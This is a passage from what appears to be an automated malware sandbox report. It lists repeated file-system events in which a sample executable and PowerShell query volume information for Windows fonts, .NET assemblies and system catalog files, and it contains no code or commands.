                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Users\user\Desktop\PzPxqbK89H.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
